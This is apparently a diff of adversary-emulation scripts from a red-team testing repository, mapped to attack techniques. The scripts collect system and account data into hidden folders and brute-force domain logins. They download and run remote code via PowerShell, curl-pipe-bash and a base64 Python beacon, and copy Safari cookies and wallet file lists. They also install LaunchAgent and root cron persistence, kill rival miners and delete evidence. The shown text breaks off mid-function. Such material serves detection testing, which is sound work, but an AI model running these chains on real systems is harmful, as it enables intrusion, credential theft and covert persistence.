# This particular Chain Reaction focuses on simulating reconnaisance and staging files for exfiltration
# Tactic: Collection
# Technique: Data Staged https://attack.mitre.org/wiki/Technique/T1074
# Tactic: Defense Evasion
# Technique: Hidden Files and Directories https://attack.mitre.org/wiki/Technique/T1158
# Create a hidden directory to store our collected data in
mkdir -p /tmp/.staging_art/
mkdir -p /tmp/.exfil/
# Tactic: Discovery
# Technique: System Information Discovery https://attack.mitre.org/wiki/Technique/T1082
# Determine Platform and Gather System Information
SYSINF=/tmp/.staging_art/system.txt
MACCHECK="$(sw_vers -productName | cut -d ' ' -f1)"
if [[ "$MACCHECK" == "Mac" ]]; then
PLAT="Mac"
else
PLAT="Linux"
fi
echo "Testing: Platform is" $PLAT
echo "Platform: " $PLAT >> $SYSINF
echo "Kernel:" >> $SYSINF && uname -a >> $SYSINF
echo "Testing: Gathering General Release Information"
if [ "$PLAT" = "Mac" ]; then
echo "Testing: Gathering macOS Release Information"
echo "System Profiler:" >> $SYSINF
system_profiler >> $SYSINF 2> /dev/null
else
echo "Testing: Gathering Linux Release Information"
echo "Release:" >> $SYSINF
lsb_release >> $SYSINF 2> /dev/null
fi
# Tactic: Discovery
# Technique: Account Discovery https://attack.mitre.org/wiki/Technique/T1087
# Collect User Account Information
USERINF=/tmp/.staging_art/users.txt
echo "Testing: Gathering User Information"
echo "Whoami:" >> $USERINF && whoami >> $USERINF
echo "Current User Activity:" >> $USERINF && w >> $USERINF 2> /dev/null
echo "Sudo Privs" >> $USERINF && sudo -l -n >> $USERINF 2> /dev/null
echo "Sudoers" >> $USERINF && cat /etc/sudoers >> $USERINF 2> /dev/null
echo "Last:" >> $USERINF && last >> $USERINF 2> /dev/null
if [ "$PLAT" == "Mac" ]; then
echo "Testing: Gathering Mac Group Information"
echo "Group Information:" >> $USERINF
dscl . list /Groups >> $USERINF
dscacheutil -q group >> $USERINF
else
echo "Testing: Gathering Linux Group Information"
echo "Group Information:" >> $USERINF
cat /etc/passwd >> $USERINF
echo "Elevated Users" >> $USERINF && grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' >> $USERINF
fi
# Tactic: Discovery
# Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
# Check for common security Software
SECINF=/tmp/.staging_art/security.txt
echo "Testing: Gathering Security Software Information"
echo "Running Security Processes" >> $SECINF && ps ax | grep -v grep | grep -e Carbon -e Snitch -e OpenDNS -e RTProtectionDaemon -e CSDaemon -e cma >> $SECINF
# Tacttic: Exfiltration
# Technique: Data Compresssed https://attack.mitre.org/wiki/Technique/T1002
# Technique: Data Encrypted https://attack.mitre.org/wiki/Technique/T1022
# Compress and encrypt all collected data
echo "Testing: Zip up the Recon"
zip --password "Hope You Have Eyes on This!!" /tmp/.staging_art/loot.zip /tmp/.staging_art/* > /dev/null 2>&1
# Tacttic: Exfiltration
# Technique: Data Transfer Size Limits https://attack.mitre.org/wiki/Technique/T1030
# Split the file up into 23 byte chunks for easier exfiltration
echo "Testing: Split the file for Exfil"
split -a 15 -b 23 "/tmp/.staging_art/loot.zip" "/tmp/.exfil/loot.zip.part-"
# Tactic: Defense Evasion
# Technique: Delete File https://attack.mitre.org/wiki/Technique/T1107
# Delete evidence
rm -rf /tmp/.staging_art/
# Optionally, delete exfil directory to clean up
# rm -rf /tmp/.exfil/
ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat
+49
View File
@@ -0,0 +1,49 @@
:: Chain Reaction - Reactor
::
::
:: Tactic: Discovery
:: Technique: System Owner/User Discovery: https://attack.mitre.org/wiki/Technique/T1033
:: Single Endpoint
:: for /F "tokens=1,2" %%i in ('qwinsta /server:<COMPUTERNAME> ^| findstr "Active Disc"') do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
:: Multiple Endpoints
@FOR /F %%n in (computers.txt) DO @FOR /F "tokens=1,2" %%i in ('qwinsta /server:%%n ^| findstr "Active Disc") do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
:: Tactic: Credential Access, Lateral Movement
:: Technique: Brute Force: https://attack.mitre.org/wiki/Technique/T1110
:: Technique: Windows Admin Shares: https://attack.mitre.org/wiki/Technique/T1077
@FOR /F %%n in (usernames.txt) DO @FOR /F %%p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%%n %%p 1>NUL 2>&1 && @echo [*] %%n:%%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
:: Tactic: Discovery
:: Technique: Security Software Discovery: https://attack.mitre.org/wiki/Technique/T1063
netsh.exe advfirewall firewall show rule name=all
tasklist.exe | findstr cb
tasklist.exe | findstr virus
tasklist.exe | findstr defender
:: Tactic: Execution, Discovery
:: Technique: PowerShell: https://attack.mitre.org/wiki/Technique/T1086
:: Technique: Multiple Discovery
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
:: Tactic: Collection
:: Technique: Automated Collection: https://attack.mitre.org/wiki/Technique/T1119
for /R c: %%f in (*.docx) do copy %%f c:\temp\
:: Tactic: Exfiltration
:: Technique: Data Compressed: https://attack.mitre.org/wiki/Technique/T1002
cmd.exe /c powershell.exe Compress-Archive -Path C:\temp\* -CompressionLevel Optimal -DestinationPath C:\temp\allthedataz.zip
ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
+16
View File
@@ -0,0 +1,16 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>cookie-miner-backdoor-launchagent.plist</string>
<key>ProgramArguments</key>
<array>
<string>python</string>
<string>-c</string>
<string>import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'));</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
+14
View File
@@ -0,0 +1,14 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>ProgramArguments</key>
<array>
<string>/Users/Shared/xmrig2</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>Label</key>
<string>cookie-miner-payload-launchagent.plist</string>
</dict>
</plist>
ARTifacts/Chain_Reactions/cookie-miner-stage-01.sh
+49
View File
@@ -0,0 +1,49 @@
#! /bin/bash
# Tactic: Discovery
# Technique: T1033 - System Owner/User Discovery
OUTPUT="$(id -un)"
# Tactic: Collection
# Technique: T1005 - Data from Local System
cd ~/Library/Cookies
grep -q "coinbase" "Cookies.binarycookies"
# Tactic: Collection
# Technique: T1074 - Data Staged
mkdir ${OUTPUT}
cp Cookies.binarycookies ${OUTPUT}/Cookies.binarycookies
# Tactic: Exfiltration
# Technique: T1002 - Data Compressed
zip -r interestingsafaricookies.zip ${OUTPUT}
# Tactic: Exfiltration
# Technique: T1048 - Exfiltration Over Alternative Protocol
# Simulate network connection for exfiltration
curl https://atomicredteam.io > /dev/null
curl --silent https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py | python - ``
# Tactic: Discovery
# Technique: T1083 - File and Directory Discovery
find ~ -name "*wallet*" > interestingfiles.txt
cp interestingfiles.txt ${OUTPUT}/interestingfiles.txt
# Tactic: Persistence
# Technique: T1159 - Launch Agent
mkdir -p ~/Library/LaunchAgents
cd ~/Library/LaunchAgents
curl --silent -o com.apple.rig2.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
curl --silent -o com.proxy.initialize.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
launchctl load -w com.apple.rig2.plist
launchctl load -w com.proxy.initialize.plist
cd /Users/Shared
curl --silent -o xmrig2 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.macos
# Tactic: Defense Evasion
# Technique: T1222 - File Permissions Modification
chmod +x ./xmrig2
./xmrig2
ARTifacts/Chain_Reactions/cookie-miner-stage-02.py
+25
View File
@@ -0,0 +1,25 @@
# import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
# ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
# out = ps.stdout.read()
# ps.stdout.close()
# if re.search("Little Snitch", out):
# sys.exit()
# import urllib2;
# UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://atomicredteam.io';t='/news.php';req=urllib2.Request(server+t);
# req.add_header('User-Agent',UA);
# req.add_header('Cookie',"session=BmHiW7UA/sf9C279oE2owK9LZ0c=");
# proxy = urllib2.ProxyHandler();
# o = urllib2.build_opener(proxy);
# urllib2.install_opener(o);
# a=urllib2.urlopen(req).read();
# Tactic: Defense Evasion
# Technique: T1140 - Deobfuscate/Decode Files or Information
#
# Tactic: Discovery
# Technique: T1057 - Process Discovery
#
# Tactic: Command and Control
# Technique: T1043 - Commonly Used Port
#
import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'))
ARTifacts/Chain_Reactions/mirai-reaction-stage-01.sh
Executable
+17
View File
@@ -0,0 +1,17 @@
#! /bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
# Tactic: Discovery
# Technique: T1082 - System Information discovery
MIRAI_EXT=`uname -m`
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O mirai.$MIRAI_EXT
# Tactic: Defense Evasion
# Technique: T1222 - File Permissions Modification
chmod +x mirai.$MIRAI_EXT
./mirai.$MIRAI_EXT
# Tactic: Defense Evasion
# Technique: T1107 - File Deletion
rm -rf mirai.$MIRAI_EXT
ARTifacts/Chain_Reactions/rocke-and-roll-stage-01.sh
+10
View File
@@ -0,0 +1,10 @@
#! /bin/bash
# Tactic: Defense Evasion
# Technique: T1027 - Obfuscated Files or Information
bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh)|base64 -d |/bin/bash"
# If you want to skip the base64 process, uncommend the following line:
# bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|/bin/bash"
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 01" >> /tmp/atomic.log
ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh
+81
View File
@@ -0,0 +1,81 @@
IyEgL2Jpbi9iYXNoCgpmdW5jdGlvbiBjKCkgewpwa2lsbCAtZiBzb3VycGx1bQpwa2lsbCAtZiB4
bXJpZwpwa2lsbCAtZiBjcnlwdG9uaWdodApwa2lsbCAtZiBzdHJhdHVtCnBraWxsIC1mIG1peG5l
cmR4CnBraWxsIC1mIG1pbmV4bXIKcGtpbGwgLWYgbWluZXJkCnBraWxsIC1mIG1pbmVyZ2F0ZQpw
a2lsbCAtZiBrd29ya2VyMzQKcGtpbGwgLWYgWGJhc2gKCiMgICBUYWN0aWM6IERlZmVuc2UgRXZh
c2lvbgojICAgVGVjaG5pcXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24K
Y2hhdHRyIC1pIC90bXAva3dvcmtlcmRzIC92YXIvdG1wL2t3b3JrZXJkcwoKIyAgIFRhY3RpYzog
RGVmZW5zZSBFdmFzaW9uCiMgICBUZWNobmlxdWU6IFQxMTA3IC0gRmlsZSBEZWxldGlvbgpybSAt
cmYgL3RtcC9rd29ya2VyZHMgL3Zhci90bXAva3dvcmtlcmRzCgojICAgVGFjdGljOiBEaXNjb3Zl
cnkKIyAgIFRlY2huaXF1ZTogVDEwNTcgLSBQcm9jZXNzIERpc2NvdmVyeQpwcyBhdXhmfGdyZXAg
LXYgZ3JlcHxncmVwIC12ICJcXyIgfGdyZXAgLXYgImt0aHJlYWRkIiB8Z3JlcCAiXFsuKlxdInxh
d2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCnBzIGF1eGZ8Z3Jl
cCAtdiBncmVwfGdyZXAgInhtcmlnIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+
L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAiWGJhc2giIHwgYXdrICd7
cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpwcyBhdXhmfGdyZXAgLXYg
Z3JlcHxncmVwICJzdHJhdHVtIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rl
di9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yIiB8IGF3ayAne3ByaW50
ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8
Z3JlcCAibWluZXJkIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
IDI+JjEKCiMgICBUYWN0aWM6IERpc2NvdmVyeQojICAgVGVjaG5pcXVlOiBUMTA0OSAtIFN5c3Rl
bSBOZXR3b3JrIENvbm5lY3Rpb25zIERpc2NvdmVyeQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzMz
IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxs
IC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo0NDQ0IHxhd2sgJ3twcmlu
dCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251
bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo1NTU1IHxhd2sgJ3twcmludCAkN30nfCBhd2sg
LUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRz
dGF0IC1hbnAgfCBncmVwIDo2NjY2IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3By
aW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBn
cmVwIDo3Nzc3IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4
YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzQ3IHxh
d2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05
ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDoxNDQ0NCB8YXdrICd7cHJpbnQg
JDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
IDI+JjEKbmV0c3RhdCAtYW5wIHwgZ3JlcCA6MTQ0MzMgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAt
RidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCgplY2hv
ICQoZGF0ZSAtdSkgIkV4ZWN1dGVkIEF0b21pYyBSZWQgVGVhbSBSb2NrZSBhbmQgUm9sbCwgU3Rh
Z2UgMDIsIHBhcnQgQyIgPj4gL3RtcC9hdG9taWMubG9nCn0KCmZ1bmN0aW9uIGIoKSB7CiAgICBt
a2RpciAtcCAvdmFyL3RtcAoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAgIyAg
IFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCiAgICBjaG1v
ZCAxNzc3IC92YXIvdG1wCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAg
VGVjaG5pcXVlOiBUMTAzNiAtIE1hc3F1ZXJhZGluZwogICAgKGN1cmwgLWZzU0wgLS1jb25uZWN0
LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnlj
by9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvYXRvbWlj
LWhlbGxvIC1vIC92YXIvdG1wL2t3b3JrZXJkc3x8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2Vy
Y29udGVudC5jb20vcmVkY2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMv
Q2hhaW5fUmVhY3Rpb25zL2F0b21pYy1oZWxsbyAtTyAvdmFyL3RtcC9rd29ya2VyZHMpICYmIGNo
bW9kICt4IC92YXIvdG1wL2t3b3JrZXJkcwogICAgbm9odXAgL3Zhci90bXAva3dvcmtlcmRzID4v
ZGV2L251bGwgMj4mMSAmCgogICAgZWNobyAkKGRhdGUgLXUpICJFeGVjdXRlZCBBdG9taWMgUmVk
IFRlYW0gUm9ja2UgYW5kIFJvbGwsIFN0YWdlIDAyLCBwYXJ0IEIiID4+IC90bXAvYXRvbWljLmxv
Zwp9CgpmdW5jdGlvbiBhKCkgewoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAg
IyAgIFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCgljaGF0
dHIgLWkgL2V0Yy9jcm9uLmQvcm9vdCAvdmFyL3Nwb29sL2Nyb24vcm9vdCAvdmFyL3Nwb29sL2Ny
b24vY3JvbnRhYnMvcm9vdAoKICAgICMgICBUYWN0aWM6IFBlcnNpc3RlbmNlCiAgICAjICAgVGVj
aG5pcXVlOiBUMTE2OCAtIExvY2FsIEpvYiBTY2hlZHVsaW5nCgllY2hvIC1lICIqLzEwICogKiAq
ICogcm9vdCAoY3VybCAtZnNTTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2h8fHdnZXQgLXEgLU8tIGh0dHBzOi8v
cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
b2RlZC5zaCl8c2hcbiMjIiA+IC9ldGMvY3Jvbi5kL3Jvb3QKCW1rZGlyIC1wIC92YXIvc3Bvb2wv
Y3Jvbi9jcm9udGFicwoJZWNobyAtZSAiKi8zMSAqICogKiAqIChjdXJsIC1mc1NMIGh0dHBzOi8v
cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
b2RlZC5zaHx8d2dldCAtcSAtTy0gaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Jl
ZGNhbmFyeWNvL2F0b21pYy1yZWQtdGVhbS9tYXN0ZXIvQVJUaWZhY3RzL0NoYWluX1JlYWN0aW9u
cy9yb2NrZS1hbmQtcm9sbC1zdGFnZS0wMi1kZWNvZGVkLnNoKXxzaFxuIyMiID4gL3Zhci9zcG9v
bC9jcm9uL2Nyb250YWJzL3Jvb3QKCW1rZGlyIC1wIC9ldGMvY3Jvbi5kYWlseQoJKGN1cmwgLWZz
U0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNv
bS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFj
dGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVjb2RlZC5zaCAtbyAvZXRjL2Nyb24uZGFp
bHkvb2FuYWNyb25lcnx8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2ggLU8gL2V0Yy9jcm9uLmRhaWx5L29h
bmFjcm9uZXIpCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAgVGVjaG5p
cXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24KICAgIGNobW9kIDc1NSAv
ZXRjL2Nyb24uZGFpbHkvb2FuYWNyb25lcgoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lv
bgogICAgIyAgIFRlY2huaXF1ZTogVDEwOTkgLSBUaW1lc3RvbXAKCXRvdWNoIC1hY21yIC9iaW4v
c2ggL2V0Yy9jcm9uLmRhaWx5L29hbmFjcm9uZXIKICAgIHRvdWNoIC1hY21yIC9iaW4vc2ggL2V0
Yy9jcm9uLmQvcm9vdAogICAgdG91Y2ggLWFjbXIgL2Jpbi9zaCAvdmFyL3Nwb29sL2Nyb24vY3Jv
bnRhYnMvcm9vdAoKICAgIGVjaG8gJChkYXRlIC11KSAiRXhlY3V0ZWQgQXRvbWljIFJlZCBUZWFt
IFJvY2tlIGFuZCBSb2xsLCBTdGFnZSAwMiwgcGFydCBBIiA+PiAvdG1wL2F0b21pYy5sb2cKfQoK
YQpiCmM=
ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh
+90
View File
@@ -0,0 +1,90 @@
#! /bin/bash
function c() {
pkill -f sourplum
pkill -f xmrig
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f minexmr
pkill -f minerd
pkill -f minergate
pkill -f kworker34
pkill -f Xbash
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chattr -i /tmp/kworkerds /var/tmp/kworkerds
# Tactic: Defense Evasion
# Technique: T1107 - File Deletion
rm -rf /tmp/kworkerds /var/tmp/kworkerds
# Tactic: Discovery
# Technique: T1057 - Process Discovery
ps auxf|grep -v grep|grep -v "\_" |grep -v "kthreadd" |grep "\[.*\]"|awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "Xbash" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "stratum" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "minerd" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
# Tactic: Discovery
# Technique: T1049 - System Network Connections Discovery
netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part C" >> /tmp/atomic.log
}
function b() {
mkdir -p /var/tmp
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chmod 1777 /var/tmp
# Tactic: Defense Evasion
# Technique: T1036 - Masquerading
(curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -o /var/tmp/kworkerds||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds
nohup /var/tmp/kworkerds >/dev/null 2>&1 &
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part B" >> /tmp/atomic.log
}
function a() {
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chattr -i /etc/cron.d/root /var/spool/cron/root /var/spool/cron/crontabs/root
# Tactic: Persistence
# Technique: T1168 - Local Job Scheduling
